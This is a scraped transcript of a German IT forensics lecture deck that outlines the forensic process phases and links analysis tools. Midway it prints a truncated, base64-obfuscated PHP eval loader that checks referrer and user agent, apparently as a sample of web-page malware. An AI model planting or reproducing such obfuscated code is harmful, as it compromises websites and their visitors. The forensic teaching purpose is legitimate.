powerpoint-präsentationst.inf.tu-dresden.de/files/teaching/ws16/ring/it_forensik-dresden.pdf ·...

30

Upload: others

Post on 21-Sep-2019

1 views

Category:

Documents


0 download

TRANSCRIPT

Operative Vorbereitung

Datensammlung und forensische Duplikation (Beweismittelsicherung)

Untersuchung und Analyse der Daten (Live-Analyse, Post-mortem-Analyse)

Dokumentation der Fakten und Rekonstruktion des Vorfalls

Maßnahmendefinition zur Verhinderung weiterer Vorfälle

Operative Vorbereitung

Datensammlung und forensische Duplikation (Beweismittelsicherung)

Untersuchung und Analyse der Daten (Live-Analyse, Post-mortem-Analyse)

Dokumentation der Fakten und Rekonstruktion des Vorfalls

Maßnahmendefinition zur Verhinderung weiterer Vorfälle

Caine: http://www.caine-live.net/

Live View: http://liveview.sourceforge.net/

Operative Vorbereitung

Datensammlung und forensische Duplikation (Beweismittelsicherung)

Untersuchung und Analyse der Daten (Live-Analyse, Post-mortem-Analyse)

Dokumentation der Fakten und Rekonstruktion des Vorfalls

Maßnahmendefinition zur Verhinderung weiterer Vorfälle

<?php eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokbmNjdj1oZWFkZXJzX3NlbnQoKTsNCmlmICghJG5jY3Ypew0KJHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOw0KJHVhPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCmlmIChzdHJpc3RyKCRyZWZl…

IDA Pro 5: https://www.hex-rays.com/index.shtml/

dex2jar: https://sourceforge.net/projects/dex2jar/

.NET Reflector / ILSpy: http://ilspy.net/

Operative Vorbereitung

Datensammlung und forensische Duplikation (Beweismittelsicherung)

Untersuchung und Analyse der Daten (Live-Analyse, Post-mortem-Analyse)

Dokumentation der Fakten und Rekonstruktion des Vorfalls

Maßnahmendefinition zur Verhinderung weiterer Vorfälle

https://www.bsi.bund.de/SharedDocs/Downloads/

DE/BSI/Cyber-Sicherheit/Themen/Leitfaden_IT-Forensik.pdf

30